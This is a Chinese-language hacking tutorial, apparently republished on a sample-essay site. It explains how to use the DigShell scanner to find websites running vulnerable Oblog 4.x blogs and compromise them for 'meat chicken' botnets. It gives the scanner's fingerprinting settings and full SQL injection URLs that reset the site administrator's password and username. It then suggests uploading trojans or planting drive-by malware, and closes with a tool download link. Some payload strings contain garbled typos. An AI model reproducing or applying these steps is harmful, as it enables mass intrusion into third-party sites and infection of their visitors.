首页 > 范文大全 > 正文

新版挖掘鸡抓捕肉鸡更轻松

开篇:润墨网以专业的文秘视角,为您筛选了一篇新版挖掘鸡抓捕肉鸡更轻松范文,如需获取更多写作素材,在线客服老师一对一协助。欢迎您的阅读与分享!

新版挖掘鸡与新漏洞,快速找肉鸡

新版本的“挖掘鸡DigShell v4.02”程序界面与前面的版本没有太大的区别,主要在于自定义后缀的功能增强。利用DigShell v4.02,我们可以快速搜索出存在着新漏洞的站点肉鸡。这比利用百度或Google之类的快速精确得多了。这里我们以前不久出现的Oblog博客SQL注入漏洞为例,结合挖掘鸡的搜索功能,快速寻找到有漏洞的下载站点,并攻击抓鸡。

oblog的新漏洞

Oblog是一个常用的博客程序,在国内各大博客站点中应用非常广,也是个人建博客的常见选择。Oblog4.0/4.5最近出现的SQL新漏洞,主要是在程序网页文件“APl_Response.asp”中,对用户提交的数据未进行完全过滤,因此用户可以直接提交SQL注入语句,修改任意用户的密码,甚至控制网站服务器。

一般来说,要搜索存在漏洞的网站程序,只需要在百度或Google中,以网站程序的版权标识为关键词,例如要搜索动网论坛,可以“Powered by Dvbbs”进行搜索。即可搜索到相应的站点。但是当我们以“Powered byOblog”为关键词进行搜索时,却很难搜索到存在漏洞的Olog博客站点。这是由于使用了Oblog博客的网站,大多对其版权标识进行了修改,因此比较难搜索到漏洞站点。这里我们就用挖掘鸡来帮助我们寻找漏洞站点,快速抓鸡。

寻找挖掘标识符

挖掘鸡搜索肉鸡站点,是靠关键字与特征字符进行识别的,在挖掘鸡中已经内置了一些搜索关键词。可方便的搜索各种漏洞站点。不过新的漏洞搜索关键词,是需要我们手工添加的。

打开挖掘鸡,点击“选择后缀”选项页,可以看到每个搜索项目。主要由“文件名”、“路径组”和“特征字符串”三项组成。我们已知道存在漏洞的网页文件是“APl_Response.asp”,该文件路径一般为:“网站博客目录/APl/APl_Response.asp”。因此,“文件名”为“API_Response.asp”;“路径组”为“/APl/”。“特征字符串”是漏洞页面所共有显示的字符,在这里笔者已经手工找到了一个漏洞站点_网页,在浏览器中打开此网页,可看到其中显示有“oblog4”、“系统并未开启整合接口!”等字符串。这里选择“oblog4”作为特征字符串。

添加oblog漏洞搜索项目

在界面空白处点击右键,在弹出菜单中选择“添加”命令。添加一个新的搜索项目。

将新添加搜索项目的“名称”,修改为“oblog博客SQL注入漏洞”。并参照上面填写“文件名”、“路径组”和“特征字符串”三项;至于“描述信息”,可以随便填写。“扫描模式”可设置为“高速模式”,其它设置项目可保持默认的。

在搜索项目列表中,勾选“挖掘测试-index.asp”后缀,关键词可不填,点击界面右上方的“开始(≥)”按钮。切换到“扫描结果”选项页。一般几分钟内就能够挖到许多结果,这说明挖掘鸡正常工作。

搜索oblog漏洞项目

挖掘鸡工作正常的话,就可以开始搜索Oblog漏洞站点了,在“选择后缀”选项页中勾选刚才添加的Oblog项目。在搜索前,可将界面上方的“关键词”设置为“oblog”,或其它字符。这样在搜索时可快速过滤掉一些无关的站点。切换到“高级选项”中,去掉对“忽略网址”和“手动添加扫描网址”项的选择,点击右上角的“开始”按钮,即可开始扫描Oblog漏洞站点了。

扫描等待的时间不等,而且有一定的随机性,就会出现扫描结果了。在“扫描结果”选项页的“挖掘成果”列表中。可以看到扫描到的Oblog漏洞站点。点击某个站点,在右边的窗口中可打开此页面。

肉鸡轻松

在挖掘鸡搜索结果列表中,随便挑选一个漏洞站点,在浏览器中打开,就可通过SQL漏洞修改管理员密码了。

检测是否存在漏洞

在进行SQL攻击前,首先要确定此网站使用的Oblog程序是SQL版的,否则将无法执行SQL语句。如何判断程序的版本呢?很简单,登录网站博客后台管理员页面。在管理员页面中就可以看到程序版本了。后台管理员页面的地址一般是“BLOG地址/admin/admin_login.asp”,SQL版的话后面会显示SQL字符。另外,要注意一点,只有版本号为“Version4.50 Final Build0619(SQL)”之前的程序才有此漏洞。

修改管理员用户名

这里选择的站点目标是“blog.52*****com/APl/APl_ Response.asp”,在浏览器中打开此网址链接。在网址后面添加如下格式的SQL注入语句:

?syskey=用户名MD5值&username=用户名&savecookie=0&password=1';update oblog_admin set password='密码MD5值'%20where%20id=1--

其中“用户名MD5值”和“用户名”可以任意取。但是两者要匹配,例如将用户名设置为“xiaoyao”。那么“用户名MD5值”就应该为相应的MD5加密值“a37ddc2b60a06837”。“密码MD5值”可为任意字符的MD5值,比如要修改密码为“123456”,那么相应MD5值为“49ba59abbe56e057”。因此,可在浏览器中将SQL注入语句改为:

blog.52******.com/APl/APl Response.asp?syskey=a37ddc2b60a06837&usemame=xiaoyao&savecookie=0&password=l';update oblog_admin set password='49ba59abbe56e057%20where%201d=1--

执行此命令后,即可将Oblog的后台管理员密码修改为“123456”;一般来说,管理员的默认用户名都为“admin”。如果管理员进行了修改。那么也可直接将管理员用户名给改回来,执行如下命令即可:

blog.52******.com/APl/APl_Response.asp?syskey=a37ddc2b60a06837&usemame=xiaoyao&savecookie=0&password=l';update oblog_admin set usemame='admin'%20where%20id=1--

执行了上面的命令后,就可以用用户名“admin”和密码“123456”,登录后台管理页面了。登录后台后,就可以上传木马或者直接在网页上挂马,大量捕获肉鸡了。相关的内容我们以前介绍过许多,这里就不多说了。

其实挖掘鸡的功能绝不仅仅是挖掘Oblog漏洞,而且当本篇文章发表之时,Oblog漏洞也许很快就被补得差不多了。我们学习这篇文章的目的,是通过这个例子,学会如何用挖掘鸡挖掘新出的漏洞站点,让你抓鸡时比别人更快一步!

下载地址:

/uploads/digshell.exe